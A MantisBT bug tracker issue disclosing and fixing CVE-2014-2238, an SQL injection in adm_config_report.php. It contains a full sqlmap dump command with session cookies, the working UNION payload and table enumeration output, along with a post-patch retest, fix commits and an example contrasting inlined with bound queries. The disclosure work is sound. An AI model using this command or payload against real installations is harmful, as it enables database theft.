View Issue Details

ID: 0017055
Project: mantisbt
Category: security
View Status: public
Last Update: 2014-03-03 14:24
Reporter: HauntIT
Assigned To: dregad
Priority: immediate
Severity: major
Reproducibility: always
Status: closed
Resolution: fixed
Product Version: 1.2.13
Target Version: 1.2.17
Fixed in Version: 1.2.17
Summary: 0017055: CVE-2014-2238: SQL injection vulnerability in adm_config_report.php
Description

Jakub Galczyk from HauntIT discovered an SQL injection vulnerability in the manage configuration page.

Additional Information

k@lab:~/src/sqlmap$ ./sqlmap.py -u "http://10.149.14.62//k/cms/mantis/mantisbt-1.2.16/adm_config_report.php" --data "save=1&filter_user_id=0&filter_project_id=0&filter_config_id=-2&apply_filter_button=Apply+Filter" -cookie "groupoffice=l8iqg3amg3klb0rn39u2ms19q3; p7token=2aec66601c948d5bf84eae77cc743529; itop-6e03ab144a03733e272e7756ba585991=ual3fb0vsqm9847uodsvs79472; PHPSESSID=3srq832a7cfmn6dku1ttr70tq1; utma=65758510.2100553510.1393586134.1393586134.1393586134.1; utmc=65758510;__utmz=65758510.1393586134.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); MANTIS_secure_session=1; MANTIS_STRING_COOKIE=f53b003d0014eeea9028334751d8c28bf8f23e56fe7bc77e46bbe7c857a280f4; MANTIS_PROJECT_COOKIE=1; MANTIS_MANAGE_CONFIG_COOKIE=0%3A0%3A-2; MANTIS_VIEW_ALL_COOKIE=1; MANTIS_BUG_LIST_COOKIE=1;" --dbms=mysql --dump

sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 15:19:12

[15:19:12] [INFO] testing connection to the target URL
[15:19:12] [INFO] testing if the target URL is stable. This can take a couple of seconds
you provided a HTTP Cookie header value. The target URL provided its own cookies within the HTTP Set-Cookie h
[15:19:16] [WARNING] target URL is not stable. sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison' and provide a string or regular expression to match on
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit]
[15:19:17] [INFO] testing if POST parameter 'save' is dynamic
[15:19:17] [WARNING] POST parameter 'save' does not appear dynamic
(...)
[15:20:32] [INFO] target URL appears to be UNION injectable with 6 columns
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n]
[15:22:22] [INFO] testing 'Generic UNION query (11) - 1 to 10 columns'
[15:22:25] [INFO] target URL appears to be UNION injectable with 7 columns
[15:22:32] [INFO] POST parameter 'filter_config_id' is 'Generic UNION query (11) - 1 to 10 columns' injectable
POST parameter 'filter_config_id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
(...)

[15:23:13] [WARNING] POST parameter 'apply_filter_button' is not injectable
sqlmap identified the following injection points with a total of 815 HTTP(s) requests:

Place: POST
Parameter: filter_config_id
Type: UNION query
Title: Generic UNION query (11) - 6 columns
Payload: save=1&filter_user_id=0&filter_project_id=0&filter_config_id=-4074' UNION ALL SELECT 11,CONCAT(0x716b737471,0x737a4e7050735579665a,0x71706b6d71),11,11,11,11-- &apply_filter_button=Apply Filter

[15:23:13] [INFO] testing MySQL
[15:23:14] [INFO] confirming MySQL
[15:23:14] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian
web application technology: Apache 2.2.22, PHP 5.4.4
back-end DBMS: MySQL >= 5.0.0
[15:23:14] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[15:23:14] [INFO] fetching current database
[15:23:14] [INFO] fetching tables for database: 'bugtracker'
[15:23:14] [INFO] the SQL query used returns 31 entries
[15:23:15] [INFO] retrieved: "mantis_bug_file_table"
[15:23:15] [INFO] retrieved: "mantis_bug_history_table"
[15:23:15] [INFO] retrieved: "mantis_bug_monitor_table"
[15:23:15] [INFO] retrieved: "mantis_bug_relationship_table"
[15:23:15] [INFO] retrieved: "mantis_bug_revision_table"
[15:23:15] [INFO] retrieved: "mantis_bug_table"
[15:23:16] [INFO] retrieved: "mantis_bug_tag_table"
[15:23:16] [INFO] retrieved: "mantis_bug_text_table"
[15:23:16] [INFO] retrieved: "mantis_bugnote_table"
[15:23:16] [INFO] retrieved: "mantis_bugnote_text_table"
[15:23:16] [INFO] retrieved: "mantis_category_table"
(...)

Tags: No tags attached.

Activities

dregad (developer), 2014-02-28 12:11, ~0039585
Last edited: 2014-02-28 12:12

I can confirm the vulnerability, which is due to inlining query parameters instead of using db_param().

Bug was introduced in 1.2.13, by commit f8a81a33880752364ea47bdd9a987bff986c81de
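The root cause named in the note above, inlining the request value into the SQL text instead of binding it through a placeholder, can be shown end to end. The following is an added example, not MantisBT code: it models the six-column filter query with a constructed SQLite table (the column names are assumptions, not MantisBT's real schema) and replays the UNION probe from the report, with MySQL's `CONCAT(0x..)` rewritten as SQLite string concatenation. The inlined form returns the scanner's marker string in the result set, which is exactly what sqlmap looks for; the bound form treats the whole payload as a literal filter value and returns nothing.

```python
# Added example, not MantisBT code: inlined vs. bound query parameter,
# modelled on the adm_config_report.php filter. Schema is constructed.
import sqlite3

# Six selected columns, matching the column count sqlmap found injectable
# in the report above (constructed schema; column names are assumptions).
SELECT_COLS = "config_id, user_id, project_id, type, value, access_reqd"

# Constructed sample rows standing in for real configuration entries.
SAMPLE_ROWS = [
    ("allow_signup", 0, 0, 1, "1", 90),
    ("default_language", 0, 0, 3, "english", 90),
]

# sqlmap's UNION probe from the report: the three hex literals decode to
# these fragments, and CONCAT(...) becomes SQLite's || operator. The probe
# selects a marker string which the scanner then searches for in the page.
MARKER = "qkstq" + "szNpPsUyfZ" + "qpkmq"
PAYLOAD = ("-4074' UNION ALL SELECT 11,'qkstq'||'szNpPsUyfZ'||'qpkmq',"
           "11,11,11,11-- ")


def make_db():
    """In-memory table with the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(f"CREATE TABLE config ({SELECT_COLS})")
    conn.executemany("INSERT INTO config VALUES (?,?,?,?,?,?)", SAMPLE_ROWS)
    return conn


def report_inlined(conn, filter_config_id):
    """Vulnerable pattern: the request value is pasted into the SQL text,
    so a quote in it ends the literal and the rest is parsed as SQL."""
    sql = (f"SELECT {SELECT_COLS} FROM config "
           f"WHERE config_id = '{filter_config_id}'")
    return conn.execute(sql).fetchall()


def report_bound(conn, filter_config_id):
    """Fixed pattern: the value travels as a bound parameter and is only
    ever compared as data, never parsed as part of the statement."""
    sql = f"SELECT {SELECT_COLS} FROM config WHERE config_id = ?"
    return conn.execute(sql, (filter_config_id,)).fetchall()


def leaks_marker(rows):
    """True if any cell of the result carries the scanner's marker string,
    i.e. attacker-chosen data came back through the query."""
    return any(MARKER in str(cell) for row in rows for cell in row)


if __name__ == "__main__":
    db = make_db()
    print("inlined leaks marker:", leaks_marker(report_inlined(db, PAYLOAD)))
    print("bound leaks marker:  ", leaks_marker(report_bound(db, PAYLOAD)))
    print("bound, legit value:  ", report_bound(db, "allow_signup"))
```

Both functions return identical rows for a legitimate filter value, so binding costs nothing functionally; the difference only appears when the value carries SQL syntax. In MantisBT terms this is the change from an inlined value to a `db_param()` placeholder that the fix commits below apply.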

dregad (developer), 2014-02-28 12:33, ~0039586

sqlmap test after patching:


[*] starting at 18:32:39

[18:32:39] [INFO] testing connection to the target URL
[18:32:39] [INFO] testing if the target URL is stable. This can take a couple of seconds
[18:32:40] [WARNING] target URL is not stable. sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison' and provide a string or regular expression to match on
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit]
[18:32:41] [INFO] skipping POST parameter 'save'
[18:32:41] [INFO] skipping POST parameter 'filter_user_id'
[18:32:41] [INFO] skipping POST parameter 'filter_project_id'
[18:32:41] [INFO] testing if POST parameter 'filter_config_id' is dynamic
[18:32:41] [INFO] confirming that POST parameter 'filter_config_id' is dynamic
[18:32:42] [INFO] POST parameter 'filter_config_id' is dynamic
[18:32:42] [WARNING] heuristic (basic) test shows that POST parameter 'filter_config_id' might not be injectable
[18:32:42] [INFO] testing for SQL injection on POST parameter 'filter_config_id'
[18:32:42] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:32:43] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[18:32:44] [INFO] testing 'MySQL inline queries'
[18:32:44] [WARNING] reflective value(s) found and filtering out
[18:32:44] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[18:32:44] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[18:32:45] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[18:32:52] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[18:32:59] [WARNING] POST parameter 'filter_config_id' is not injectable
[18:32:59] [INFO] skipping POST parameter 'apply_filter_button'
[18:32:59] [CRITICAL] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp')

[*] shutting down at 18:32:59

dregad (developer), 2014-02-28 15:03, ~0039587

CVE request http://thread.gmane.org/gmane.comp.security.oss.general/12241

Related Changesets

MantisBT: master-1.2.x a608f2d0
2014-02-28 07:23
dregad

Fix SQL injection vulnerability in adm_config_report.php

Jakub Galczyk (HauntIT blog http://hauntit.blogspot.com/) reported this
issue, introduced by f8a81a33880752364ea47bdd9a987bff986c81de in
MantisBT 1.2.13.

Root cause is the use of unsanitized inlined query parameters.

Fixes 0017055
Affected Issues: 0017055
mod - adm_config_report.php

MantisBT: master e8bdd248
2014-02-28 07:23
dregad

Fix SQL injection vulnerability in adm_config_report.php

Jakub Galczyk (HauntIT blog http://hauntit.blogspot.com/) reported this
issue, introduced by f8a81a33880752364ea47bdd9a987bff986c81de in
MantisBT 1.2.13.

Root cause is the use of unsanitized inlined query parameters.

Fixes 0017055
Affected Issues: 0017055
mod - adm_config_report.php